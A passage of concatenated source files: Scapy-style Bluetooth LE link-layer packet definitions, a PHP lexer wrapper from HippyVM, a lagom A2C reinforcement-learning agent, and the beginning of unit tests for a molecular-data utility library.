0x00: 'LL_CONNECTION_UPDATE_REQ',
0x01: 'LL_CHANNEL_MAP_REQ',
0x02: 'LL_TERMINATE_IND',
0x03: 'LL_ENC_REQ',
0x04: 'LL_ENC_RES',
0x05: 'LL_START_ENC_REQ',
0x06: 'LL_START_ENC_RES',
0x07: 'LL_UNKNOWN_RSP',
0x08: 'LL_FEATURE_REQ',
0x09: 'LL_FEATURE_RSP', # OK
0x0A: 'LL_PAUSE_ENC_REQ',
0x0B: 'LL_PAUSE_ENC_RES',
0x0C: 'LL_VERSION_IND', # OK
0x0D: 'LL_REJECT_IND',
0x0E: 'LL_SLAVE_FEATURE_REQ',
0x0F: 'LL_CONNECTION_PARAM_REQ',
0x10: 'LL_CONNECTION_PARAM_RES',
0x14: 'LL_LENGTH_REQ',
0x15: 'LL_LENGTH_RSP',
}
class CtrlPDU(Packet):
name = "CtrlPDU"
fields_desc = [
ByteEnumField("optcode", 0, BTLE_CtrlPDU_optcode)
]
def do_dissect_payload(self, s):
if s is not None:
cls = self.guess_payload_class(s)
try:
p = cls(s, _internal=1, _underlayer=self)
except KeyboardInterrupt:
raise
except Exception:
if conf.debug_dissector:
if issubtype(cls, Packet):
log_runtime.error("%s dissector failed" % cls.__name__)
else:
log_runtime.error("%s.guess_payload_class() returned [%s]" % (
self.__class__.__name__, repr(cls))) # noqa: E501
if cls is not None:
raise
p = conf.raw_layer(s, _internal=1, _underlayer=self)
self.add_payload(p)
class LL_CONNECTION_UPDATE_REQ(Packet):
name = 'LL_CONNECTION_UPDATE_REQ'
fields_desc = [
XByteField("win_size", 0x0),
XLEShortField("win_offset", 0x0),
XLEShortField("interval", 0x0),
XLEShortField("latency", 0x0),
XLEShortField("timeout", 0x0),
XLEShortField("instant", 0x0),
]
class LL_CHANNEL_MAP_REQ(Packet):
name = 'LL_CHANNEL_MAP_REQ'
fields_desc = [
BTLEChanMapField("chM", 0),
XLEShortField("instant", 0x0),
]
class LL_TERMINATE_IND(Packet):
name = 'LL_TERMINATE_IND'
fields_desc = [
XByteField("code", 0x0),
]
class LL_ENC_REQ(Packet):
name = 'LL_ENC_REQ'
fields_desc = [
StrFixedLenField("rand", "", length=8),
StrFixedLenField("ediv", "", length=2),
StrFixedLenField("skdm", "", length=8),
StrFixedLenField("ivm", "", length=4),
]
class LL_ENC_RSP(Packet):
name = 'LL_ENC_RSP'
fields_desc = [
StrFixedLenField("skds", "", length=8),
StrFixedLenField("ivs", "", length=4),
]
class LL_PAUSE_ENC_REQ(Packet):
name = 'LL_PAUSE_ENC_REQ'
class LL_PAUSE_ENC_RSP(Packet):
name = 'LL_PAUSE_ENC_RSP'
class LL_START_ENC_REQ(Packet):
name = 'LL_START_ENC_REQ'
class LL_START_ENC_RSP(Packet):
name = 'LL_START_ENC_RSP'
class LL_UNKNOWN_RSP(Packet):
name = 'LL_UNKNOWN_RSP'
fields_desc = [
XByteField("code", 0x0),
]
class LL_FEATURE_REQ(Packet):
name = "LL_FEATURE_REQ"
fields_desc = [
FlagsField("feature_set", 0, -16, [ # 4.0
'le_encryption',
# 4.1
'conn_par_req_proc', 'ext_reject_ind', 'slave_init_feat_exch',
# 4.2
'le_ping',
'le_data_len_ext', 'll_privacy', 'ext_scan_filter',
# 5.0
'll_2m_phy', 'tx_mod_idx', 'rx_mod_idx', 'le_coded_phy',
'le_ext_adv', 'le_periodic_adv',
'ch_sel_alg', 'le_pwr_class']),
BitField("reserved", 0, 48),
]
class LL_FEATURE_RSP(Packet):
name = "LL_FEATURE_RSP"
fields_desc = [
FlagsField("feature_set", 0, -16, ['le_encryption', # 4.0
'conn_par_req_proc', 'ext_reject_ind', 'slave_init_feat_exch',
'le_ping', # 4.1
'le_data_len_ext', 'll_privacy', 'ext_scan_filter', # 4.2
'll_2m_phy', 'tx_mod_idx', 'rx_mod_idx', 'le_coded_phy',
'le_ext_adv', 'le_periodic_adv',
'ch_sel_alg', 'le_pwr_class']),
BitField("min_used_channels", 0, 1),
BitField("reserved", 0, 47),
]
class LL_VERSION_IND(Packet):
name = "LL_VERSION_IND"
fields_desc = [
ByteEnumField("version", 8, BTLE_Versions),
LEShortEnumField("Company", 0, BTLE_Corp_IDs),
XShortField("subversion", 0)
]
class LL_REJECT_IND(Packet):
name = "LL_REJECT_IND"
fields_desc = [
XByteField("code", 0x0),
]
class LL_SLAVE_FEATURE_REQ(Packet):
name = "LL_SLAVE_FEATURE_REQ"
fields_desc = [
FlagsField("feature_set", 0, -16, ['le_encryption', # 4.0
'conn_par_req_proc', 'ext_reject_ind', 'slave_init_feat_exch',
'le_ping', # 4.1
'le_data_len_ext', 'll_privacy', 'ext_scan_filter', # 4.2
'll_2m_phy', 'tx_mod_idx', 'rx_mod_idx', 'le_coded_phy',
'le_ext_adv', 'le_periodic_adv',
'ch_sel_alg', 'le_pwr_class']),
BitField("min_used_channels", 0, 1),
BitField("reserved", 0, 47),
]
class LL_LENGTH_REQ(Packet):
name = ' LL_LENGTH_REQ'
fields_desc = [
XLEShortField("max_rx_bytes", 251),
XLEShortField("max_rx_time", 2120),
XLEShortField("max_tx_bytes", 251),
XLEShortField("max_tx_time", 2120),
]
class LL_LENGTH_RSP(Packet):
name = ' LL_LENGTH_RSP'
fields_desc = [
XLEShortField("max_rx_bytes", 251),
XLEShortField("max_rx_time", 2120),
XLEShortField("max_tx_bytes", 251),
XLEShortField("max_tx_time", 2120),
]
# Advertisement (37-39) channel PDUs
bind_layers(BTLE, BTLE_ADV, access_addr=0x8E89BED6)
bind_layers(BTLE, BTLE_DATA)
bind_layers(BTLE_ADV, BTLE_ADV_IND, PDU_type=0)
bind_layers(BTLE_ADV, BTLE_ADV_DIRECT_IND, PDU_type=1)
bind_layers(BTLE_ADV, BTLE_ADV_NONCONN_IND, PDU_type=2)
bind_layers(BTLE_ADV, BTLE_SCAN_REQ, PDU_type=3)
bind_layers(BTLE_ADV, BTLE_SCAN_RSP, PDU_type=4)
bind_layers(BTLE_ADV, BTLE_CONNECT_REQ, PDU_type=5)
bind_layers(BTLE_ADV, BTLE_ADV_SCAN_IND, PDU_type=6)
# Data channel (0-36) PDUs
# LLID=1 -> Continue
bind_layers(BTLE_DATA, L2CAP_Hdr, LLID=2) # BTLE_DATA / L2CAP_Hdr / ATT_Hdr
bind_layers(BTLE_DATA, CtrlPDU, LLID=3) # BTLE_DATA / CtrlPDU
bind_layers(BTLE_DATA, BTLE_EMPTY_PDU, len=0) # BTLE_DATA / CtrlPDU
bind_layers(CtrlPDU, LL_CONNECTION_UPDATE_REQ, optcode=0x00) # BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU, LL_CHANNEL_MAP_REQ, optcode=0x01) # BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU, LL_TERMINATE_IND, optcode=0x02) # BTLE_DATA / CtrlPDU / LL_TERMINATE_IND
bind_layers(CtrlPDU, LL_ENC_REQ, optcode=0x03) # BTLE_DATA / CtrlPDU / LL_ENC_REQ
bind_layers(CtrlPDU, LL_ENC_RSP, optcode=0x04) # BTLE_DATA / CtrlPDU / LL_ENC_RSP
bind_layers(CtrlPDU, LL_START_ENC_REQ, optcode=0x05) # BTLE_DATA / CtrlPDU / LL_START_ENC_REQ
bind_layers(CtrlPDU, LL_START_ENC_RSP, optcode=0x06) # BTLE_DATA / CtrlPDU / LL_START_ENC_RSP
bind_layers(CtrlPDU, LL_UNKNOWN_RSP, optcode=0x07) # BTLE_DATA / CtrlPDU / LL_UNKNOWN_RSP
bind_layers(CtrlPDU, LL_FEATURE_REQ, optcode=0x08) # BTLE_DATA / CtrlPDU / LL_FEATURE_REQ
bind_layers(CtrlPDU, LL_FEATURE_RSP, optcode=0x09) # BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU, LL_VERSION_IND, optcode=0x0C) # BTLE_DATA / CtrlPDU / LL_VERSION_IND
bind_layers(CtrlPDU, LL_REJECT_IND, optcode=0x0D) # BTLE_DATA / CtrlPDU / LL_SLAVE_FEATURE_REQ
bind_layers(CtrlPDU, LL_SLAVE_FEATURE_REQ, optcode=0x0E) # BTLE_DATA / CtrlPDU / LL_SLAVE_FEATURE_REQ
bind_layers(CtrlPDU, LL_LENGTH_REQ, optcode=0x14) # BTLE_DATA / CtrlPDU / LL_LENGTH_REQ
bind_layers(CtrlPDU, LL_LENGTH_RSP, optcode=0x15) # BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
bind_layers(CtrlPDU, LL_PAUSE_ENC_REQ, optcode=0x0A) # BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
bind_layers(CtrlPDU, LL_PAUSE_ENC_RSP, optcode=0x0B) # BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
# TODO: more optcodes
conf.l2types.register(DLT_BLUETOOTH_LE_LL, BTLE)
conf.l2types.register(DLT_BLUETOOTH_LE_LL_WITH_PHDR, BTLE_RF)
conf.l2types.register(DLT_NORDIC_BLE, NORDIC_BLE)
bind_layers(BTLE_RF, BTLE)
bind_layers(NORDIC_BLE, BTLE)
bind_layers(PPI_Hdr, BTLE_PPI, pfh_type=PPI_BTLE)
|
hippy/phpcompiler.py
|
jweinraub/hippyvm
| 289 |
84967
|
from rply.token import SourcePosition
from hippy.sourceparser import SourceParser, LexerWrapper, ParseError, get_lexer
from hippy.astcompiler import compile_ast
from rpython.rlib.objectmodel import we_are_translated
MODE_LITERAL = 0
MODE_EQUALSIGN = 1
MODE_PHPCODE = 2
class PHPLexerWrapper(LexerWrapper):
def __init__(self, source, filename="", interp=None):
self.lexer = get_lexer(we_are_translated())
self.source = source
self.startlineno = 0
self.startindex = 0
self.mode = MODE_LITERAL
self.filename = filename
self.heredoc_term = None
self.interp = interp
def next(self):
mode = self.mode
if mode == MODE_PHPCODE:
return self.next_phpcode()
elif mode == MODE_LITERAL:
return self.next_literal_mode()
elif mode == MODE_EQUALSIGN:
return self.next_equal_sign()
else:
assert 0
def next_literal_mode(self):
# "literal" mode, i.e. outside "<?php ?>" tags: generates
# one B_LITERAL_BLOCK until the next opening "<?php" tag
self.mode = MODE_PHPCODE
source = self.source
index = self.startindex
assert index >= 0
tagindex = source.find('<?', index)
if tagindex == -1:
tagindex = len(source)
assert tagindex >= 0
startindex = self.startindex
assert startindex >= 0
block_of_text = source[startindex:tagindex] # may be empty
source_pos = SourcePosition(self.startindex, self.startlineno + 1, 0)
tok = self.lexer.token_class('B_LITERAL_BLOCK', block_of_text, source_pos)
self.startlineno += block_of_text.count('\n')
if source[tagindex:tagindex+5].lower() == '<?php':
pos = tagindex + 5
elif source[tagindex:tagindex+3] == '<?=':
pos = tagindex + 3
self.mode = MODE_EQUALSIGN
else:
pos = tagindex + 2
self.lexer.input(self.source, pos, self.startlineno)
return tok
def next_equal_sign(self):
self.mode = MODE_PHPCODE
source_pos = SourcePosition(self.startindex, self.startlineno + 1, 0)
return self.lexer.token_class("T_ECHO", "echo", source_pos)
def next_phpcode(self):
for tok in self.lexer.token():
# Lexer indexes lines from 0, humans from 1
tok.source_pos.lineno += 1
if tok is None:
return None # end of file
elif tok.name == 'H_NEW_LINE':
continue # ignore these and continue
elif tok.name == 'H_TABULATURE':
continue # ignore these and continue
elif tok.name == 'H_WHITESPACE':
continue # ignore these and continue
elif tok.name == 'T_COMMENT':
# look for "?>" inside single-line comments too
if not tok.getstr().startswith('/*'):
i = tok.getstr().find('?>')
if i >= 0:
endpos = self.lexer.pos - len(tok.getstr()) + i + 2
return self.end_current_block(tok, endpos)
continue
elif tok.name == 'B_END_OF_CODE_BLOCK':
return self.end_current_block(tok, self.lexer.pos)
elif tok.name == 'T_HALT_COMPILER':
return self.do_halt_compiler()
else:
return tok # a normal php token
def end_current_block(self, tok, endpos):
# a "?>" marker that ends the current block of code
# generates a ";" token followed by a B_LITERAL_BLOCK
lineno = tok.source_pos.lineno
self.startlineno = lineno
self.startindex = endpos + 1
self.mode = MODE_LITERAL
if (self.startindex < len(self.source) and
self.source[self.startindex] == '\n'):
# self.startlineno += 1 # consume \n if immediately following
self.startindex += 1
return self.lexer.token_class(";", ";", SourcePosition(endpos, lineno, 0))
def do_halt_compiler(self):
for expecting in ['(', ')', ';']:
token = self.next()
if token is None or token.name != expecting:
raise ParseError('"__halt_compiler" not followed by "();"',
token.source_pos.lineno)
#
# hack: copies the end position to a constant
if self.interp is not None:
if self.interp.lookup_constant('__COMPILER_HALT_OFFSET__') is None:
if self.mode == MODE_LITERAL:
endpos = self.startindex
else:
endpos = self.lexer.pos + 1
w_end = self.interp.space.newint(endpos)
self.interp.declare_new_constant('__COMPILER_HALT_OFFSET__',
w_end)
#
return None
DEBUG = False
def compile_php(filename, source, space, interp=None):
"""Parse and compile a PHP file, starting in literal mode (i.e.
dumping all input directly) until the first '<?' or '<?php'.
Supports a mixture of blocks of code between the blocks of texts."""
phplexerwrapper = PHPLexerWrapper(source, filename, interp)
if DEBUG:
lst = []
while True:
tok = phplexerwrapper.next()
if tok is None:
break
else:
lst.append(tok)
print [x.__dict__ for x in lst]
phplexerwrapper = iter(lst + [None])
parser = SourceParser(space, None, filename=filename)
tokens = parser.parser.parse(phplexerwrapper, state=parser)
bc = compile_ast(filename, source, tokens, space)
return bc
|
legacy/a2c/agent.py
|
zuoxingdong/lagom
| 383 |
84991
|
<gh_stars>100-1000
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils import clip_grad_norm_
from lagom.networks import BaseNetwork
from lagom.networks import make_fc
from lagom.networks import ortho_init
from lagom.networks import linear_lr_scheduler
from lagom.policies import BasePolicy
from lagom.policies import CategoricalHead
from lagom.policies import DiagGaussianHead
from lagom.value_functions import StateValueHead
from lagom.transform import ExplainedVariance
from lagom.history.metrics import final_state_from_segment
from lagom.history.metrics import terminal_state_from_segment
from lagom.history.metrics import bootstrapped_returns_from_segment
from lagom.history.metrics import gae_from_segment
from lagom.agents import BaseAgent
class MLP(BaseNetwork):
def make_params(self, config):
self.feature_layers = make_fc(self.env_spec.observation_space.flat_dim, config['network.hidden_sizes'])
self.layer_norms = nn.ModuleList([nn.LayerNorm(hidden_size) for hidden_size in config['network.hidden_sizes']])
def init_params(self, config):
for layer in self.feature_layers:
ortho_init(layer, nonlinearity='leaky_relu', constant_bias=0.0)
def reset(self, config, **kwargs):
pass
def forward(self, x):
for layer, layer_norm in zip(self.feature_layers, self.layer_norms):
x = layer_norm(F.celu(layer(x)))
return x
class Critic(BaseNetwork):
def make_params(self, config):
self.feature_layers = make_fc(self.env_spec.observation_space.flat_dim, config['network.hidden_sizes'])
self.layer_norms = nn.ModuleList([nn.LayerNorm(hidden_size) for hidden_size in config['network.hidden_sizes']])
self.output_layer = StateValueHead(config, self.device, config['network.hidden_sizes'][-1])
def init_params(self, config):
for layer in self.feature_layers:
ortho_init(layer, nonlinearity='leaky_relu', constant_bias=0.0)
self.make_optimizer(config)
def make_optimizer(self, config, **kwargs):
self.optimizer = optim.Adam(self.parameters(), lr=config['algo.lr_V'])
if config['algo.use_lr_scheduler']:
if 'train.iter' in config:
self.lr_scheduler = linear_lr_scheduler(self.optimizer, config['train.iter'], 'iteration-based')
elif 'train.timestep' in config:
self.lr_scheduler = linear_lr_scheduler(self.optimizer, config['train.timestep']+1, 'timestep-based')
else:
self.lr_scheduler = None
def optimizer_step(self, config, **kwargs):
if config['agent.max_grad_norm'] is not None:
clip_grad_norm_(self.parameters(), config['agent.max_grad_norm'])
if self.lr_scheduler is not None:
if self.lr_scheduler.mode == 'iteration-based':
self.lr_scheduler.step()
elif self.lr_scheduler.mode == 'timestep-based':
self.lr_scheduler.step(kwargs['total_T'])
self.optimizer.step()
def reset(self, config, **kwargs):
pass
def forward(self, x):
for layer, layer_norm in zip(self.feature_layers, self.layer_norms):
x = layer_norm(F.celu(layer(x)))
x = self.output_layer(x)
return x
class Policy(BasePolicy):
def make_networks(self, config):
self.feature_network = MLP(config, self.device, env_spec=self.env_spec)
feature_dim = config['network.hidden_sizes'][-1]
if self.env_spec.control_type == 'Discrete':
self.action_head = CategoricalHead(config, self.device, feature_dim, self.env_spec)
elif self.env_spec.control_type == 'Continuous':
self.action_head = DiagGaussianHead(config,
self.device,
feature_dim,
self.env_spec,
min_std=config['agent.min_std'],
std_style=config['agent.std_style'],
constant_std=config['agent.constant_std'],
std_state_dependent=config['agent.std_state_dependent'],
init_std=config['agent.init_std'])
if not config['network.independent_V']:
self.V_head = StateValueHead(config, self.device, feature_dim)
def make_optimizer(self, config, **kwargs):
self.optimizer = optim.Adam(self.parameters(), lr=config['algo.lr'])
if config['algo.use_lr_scheduler']:
if 'train.iter' in config:
self.lr_scheduler = linear_lr_scheduler(self.optimizer, config['train.iter'], 'iteration-based')
elif 'train.timestep' in config:
self.lr_scheduler = linear_lr_scheduler(self.optimizer, config['train.timestep']+1, 'timestep-based')
else:
self.lr_scheduler = None
def optimizer_step(self, config, **kwargs):
if config['agent.max_grad_norm'] is not None:
clip_grad_norm_(self.parameters(), config['agent.max_grad_norm'])
if self.lr_scheduler is not None:
if self.lr_scheduler.mode == 'iteration-based':
self.lr_scheduler.step()
elif self.lr_scheduler.mode == 'timestep-based':
self.lr_scheduler.step(kwargs['total_T'])
self.optimizer.step()
@property
def recurrent(self):
return False
def reset(self, config, **kwargs):
pass
def __call__(self, x, out_keys=['action', 'V'], info={}, **kwargs):
out = {}
features = self.feature_network(x)
action_dist = self.action_head(features)
action = action_dist.sample().detach() # TODO: detach is necessary or not ?
out['action'] = action
if 'V' in out_keys:
V = self.V_head(features)
out['V'] = V
if 'action_dist' in out_keys:
out['action_dist'] = action_dist
if 'action_logprob' in out_keys:
out['action_logprob'] = action_dist.log_prob(action)
if 'entropy' in out_keys:
out['entropy'] = action_dist.entropy()
if 'perplexity' in out_keys:
out['perplexity'] = action_dist.perplexity()
return out
class Agent(BaseAgent):
r"""Advantage Actor-Critic (A2C). """
def make_modules(self, config):
self.policy = Policy(config, self.env_spec, self.device)
if config['network.independent_V']:
self.critic = Critic(config, self.device, env_spec=self.env_spec)
def prepare(self, config, **kwargs):
self.total_T = 0
def reset(self, config, **kwargs):
pass
def choose_action(self, obs, info={}):
obs = torch.from_numpy(np.asarray(obs)).float().to(self.device)
if self.training:
if self.config['network.independent_V']:
out = self.policy(obs, out_keys=['action', 'action_logprob', 'entropy'], info=info)
out['V'] = self.critic(obs)
else:
out = self.policy(obs, out_keys=['action', 'action_logprob', 'V', 'entropy'], info=info)
else:
with torch.no_grad():
out = self.policy(obs, out_keys=['action'], info=info)
# sanity check for NaN
if torch.any(torch.isnan(out['action'])):
raise ValueError('NaN!')
return out
def learn(self, D, info={}):
logprobs = torch.stack([info['action_logprob'] for info in D.batch_infos], 1).squeeze(-1)
entropies = torch.stack([info['entropy'] for info in D.batch_infos], 1).squeeze(-1)
all_Vs = torch.stack([info['V'] for info in D.batch_infos], 1).squeeze(-1)
last_states = torch.from_numpy(final_state_from_segment(D)).float().to(self.device)
with torch.no_grad():
if self.config['network.independent_V']:
last_Vs = self.critic(last_states)
else:
last_Vs = self.policy(last_states, out_keys=['V'])['V']
Qs = bootstrapped_returns_from_segment(D, last_Vs, self.config['algo.gamma'])
Qs = torch.from_numpy(Qs.copy()).float().to(self.device)
if self.config['agent.standardize_Q']:
Qs = (Qs - Qs.mean(1, keepdim=True))/(Qs.std(1, keepdim=True) + 1e-8)
As = gae_from_segment(D, all_Vs, last_Vs, self.config['algo.gamma'], self.config['algo.gae_lambda'])
As = torch.from_numpy(As.copy()).float().to(self.device)
if self.config['agent.standardize_adv']:
As = (As - As.mean(1, keepdim=True))/(As.std(1, keepdim=True) + 1e-8)
assert all([x.ndimension() == 2 for x in [logprobs, entropies, all_Vs, Qs, As]])
policy_loss = -logprobs*As
policy_loss = policy_loss.mean()
entropy_loss = -entropies
entropy_loss = entropy_loss.mean()
value_loss = F.mse_loss(all_Vs, Qs, reduction='none')
value_loss = value_loss.mean()
entropy_coef = self.config['agent.entropy_coef']
value_coef = self.config['agent.value_coef']
loss = policy_loss + value_coef*value_loss + entropy_coef*entropy_loss
if self.config['agent.fit_terminal_value']:
terminal_states = terminal_state_from_segment(D)
if terminal_states is not None:
terminal_states = torch.from_numpy(terminal_states).float().to(self.device)
terminal_Vs = self.policy(terminal_states, out_keys=['V'])['V']
terminal_value_loss = F.mse_loss(terminal_Vs, torch.zeros_like(terminal_Vs))
terminal_value_loss_coef = self.config['agent.terminal_value_coef']
loss += terminal_value_loss_coef*terminal_value_loss
self.policy.optimizer.zero_grad()
if self.config['network.independent_V']:
self.critic.optimizer.zero_grad()
loss.backward()
self.policy.optimizer_step(self.config, total_T=self.total_T)
if self.config['network.independent_V']:
self.critic.optimizer_step(self.config, total_T=self.total_T)
self.total_T += D.total_T
out = {}
if self.policy.lr_scheduler is not None:
out['current_lr'] = self.policy.lr_scheduler.get_lr()
out['loss'] = loss.item()
out['policy_loss'] = policy_loss.item()
out['entropy_loss'] = entropy_loss.item()
out['policy_entropy'] = -entropy_loss.item()
out['value_loss'] = value_loss.item()
ev = ExplainedVariance()
ev = ev(y_true=Qs.detach().cpu().numpy().squeeze(), y_pred=all_Vs.detach().cpu().numpy().squeeze())
out['explained_variance'] = ev
return out
@property
def recurrent(self):
pass
|
smu/parser/smu_utils_lib_test.py
|
xxdreck/google-research
| 23,901 |
84992
|
<reponame>xxdreck/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for smu_utils_lib."""
import copy
import os
import tempfile
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import pandas as pd
from rdkit import Chem
from google.protobuf import text_format
from smu import dataset_pb2
from smu.parser import smu_parser_lib
from smu.parser import smu_utils_lib
MAIN_DAT_FILE = 'x07_sample.dat'
STAGE1_DAT_FILE = 'x07_stage1.dat'
TESTDATA_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'testdata')
def str_to_bond_topology(s):
bt = dataset_pb2.BondTopology()
text_format.Parse(s, bt)
return bt
def get_stage1_conformer():
parser = smu_parser_lib.SmuParser(
os.path.join(TESTDATA_PATH, STAGE1_DAT_FILE))
conformer, _ = next(parser.process_stage1())
return conformer
def get_stage2_conformer():
parser = smu_parser_lib.SmuParser(os.path.join(TESTDATA_PATH, MAIN_DAT_FILE))
conformer, _ = next(parser.process_stage2())
return conformer
class SpecialIDTest(absltest.TestCase):
def test_from_dat_id(self):
self.assertIsNone(
smu_utils_lib.special_case_bt_id_from_dat_id(123456, 'CC'))
self.assertEqual(
smu_utils_lib.special_case_bt_id_from_dat_id(999998, 'O'), 899650)
self.assertEqual(
smu_utils_lib.special_case_bt_id_from_dat_id(0, 'O'), 899650)
with self.assertRaises(ValueError):
smu_utils_lib.special_case_bt_id_from_dat_id(0, 'NotASpecialCaseSmiles')
def test_from_bt_id(self):
self.assertIsNone(smu_utils_lib.special_case_dat_id_from_bt_id(123456))
self.assertEqual(
smu_utils_lib.special_case_dat_id_from_bt_id(899651), 999997)
class GetCompositionTest(absltest.TestCase):
def test_simple(self):
bt = dataset_pb2.BondTopology()
bt.atoms.extend([
dataset_pb2.BondTopology.ATOM_C, dataset_pb2.BondTopology.ATOM_C,
dataset_pb2.BondTopology.ATOM_N, dataset_pb2.BondTopology.ATOM_H,
dataset_pb2.BondTopology.ATOM_H, dataset_pb2.BondTopology.ATOM_H
])
self.assertEqual('x03_c2nh3', smu_utils_lib.get_composition(bt))
class GetCanonicalStoichiometryWithHydrogensTest(absltest.TestCase):
def test_cyclobutane(self):
bt = smu_utils_lib.create_bond_topology('CCCC', '110011', '2222')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt), '(ch2)4')
def test_ethylene(self):
bt = smu_utils_lib.create_bond_topology('CC', '2', '22')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt), '(ch2)2')
def test_acrylic_acid(self):
bt = smu_utils_lib.create_bond_topology('CCCOO', '2000100210', '21001')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt),
'(c)(ch)(ch2)(o)(oh)')
def test_fluorine(self):
bt = smu_utils_lib.create_bond_topology('OFF', '110', '000')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt), '(o)(f)2')
def test_fully_saturated(self):
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(
smu_utils_lib.create_bond_topology('C', '', '4')), '(ch4)')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(
smu_utils_lib.create_bond_topology('N', '', '3')), '(nh3)')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(
smu_utils_lib.create_bond_topology('O', '', '2')), '(oh2)')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(
smu_utils_lib.create_bond_topology('F', '', '1')), '(fh)')
def test_nplus_oneg(self):
bt = smu_utils_lib.create_bond_topology('NO', '1', '30')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt),
'(nh3)(o)')
class ParseBondTopologyTest(absltest.TestCase):
def test_4_heavy(self):
num_atoms, atoms_str, matrix, hydrogens = smu_utils_lib.parse_bond_topology_line(
' 4 N+O O O- 010110 3000')
self.assertEqual(num_atoms, 4)
self.assertEqual(atoms_str, 'N+O O O-')
self.assertEqual(matrix, '010110')
self.assertEqual(hydrogens, '3000')
def test_7_heavy(self):
num_atoms, atoms_str, matrix, hydrogens = smu_utils_lib.parse_bond_topology_line(
' 7 N+O O O O-F F 001011101001000000000 1000000')
self.assertEqual(num_atoms, 7)
self.assertEqual(atoms_str, 'N+O O O O-F F ') # Note the trailing space
self.assertEqual(matrix, '001011101001000000000')
self.assertEqual(hydrogens, '1000000')
class CreateBondTopologyTest(absltest.TestCase):
def test_no_charged(self):
got = smu_utils_lib.create_bond_topology('CNFF', '111000', '1200')
expected_str = """
atoms: ATOM_C
atoms: ATOM_N
atoms: ATOM_F
atoms: ATOM_F
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 5
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 6
bond_type: BOND_SINGLE
}
"""
expected = str_to_bond_topology(expected_str)
self.assertEqual(str(expected), str(got))
def test_charged(self):
# This is actually C N N+O-
got = smu_utils_lib.create_bond_topology('CNNO', '200101', '2020')
expected_str = """
atoms: ATOM_C
atoms: ATOM_N
atoms: ATOM_NPOS
atoms: ATOM_ONEG
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
bonds {
atom_a: 1
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
bonds {
atom_b: 5
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 6
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 7
bond_type: BOND_SINGLE
}
"""
expected = str_to_bond_topology(expected_str)
self.assertEqual(str(expected), str(got))
def test_one_heavy(self):
got = smu_utils_lib.create_bond_topology('C', '', '4')
expected_str = """
atoms: ATOM_C
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
"""
expected = str_to_bond_topology(expected_str)
self.assertEqual(str(expected), str(got))
class FromCSVTest(absltest.TestCase):
def test_basic(self):
infile = tempfile.NamedTemporaryFile(mode='w', delete=False)
infile.write(
'id,num_atoms,atoms_str,connectivity_matrix,hydrogens,smiles\n')
infile.write('68,3,C N+O-,310,010,[NH+]#C[O-]\n')
infile.write('134,4,N+O-F F ,111000,1000,[O-][NH+](F)F\n')
infile.close()
out = smu_utils_lib.generate_bond_topologies_from_csv(infile.name)
bt = next(out)
self.assertEqual(68, bt.bond_topology_id)
self.assertLen(bt.atoms, 4)
self.assertEqual(bt.smiles, '[NH+]#C[O-]')
bt = next(out)
self.assertEqual(134, bt.bond_topology_id)
self.assertLen(bt.atoms, 5)
self.assertEqual(bt.smiles, '[O-][NH+](F)F')
class ParseDuplicatesFileTest(absltest.TestCase):
def test_basic(self):
df = smu_utils_lib.parse_duplicates_file(
os.path.join(TESTDATA_PATH, 'small.equivalent_isomers.dat'))
pd.testing.assert_frame_equal(
pd.DataFrame(
columns=[
'name1', 'stoich1', 'btid1', 'shortconfid1', 'confid1', 'name2',
'stoich2', 'btid2', 'shortconfid2', 'confid2'
],
data=[
[
'x07_c2n2o2fh3.224227.004', 'c2n2o2fh3', 224227, 4,
224227004, 'x07_c2n2o2fh3.224176.005', 'c2n2o2fh3', 224176,
5, 224176005
],
[
'x07_c2n2o2fh3.260543.005', 'c2n2o2fh3', 260543, 5,
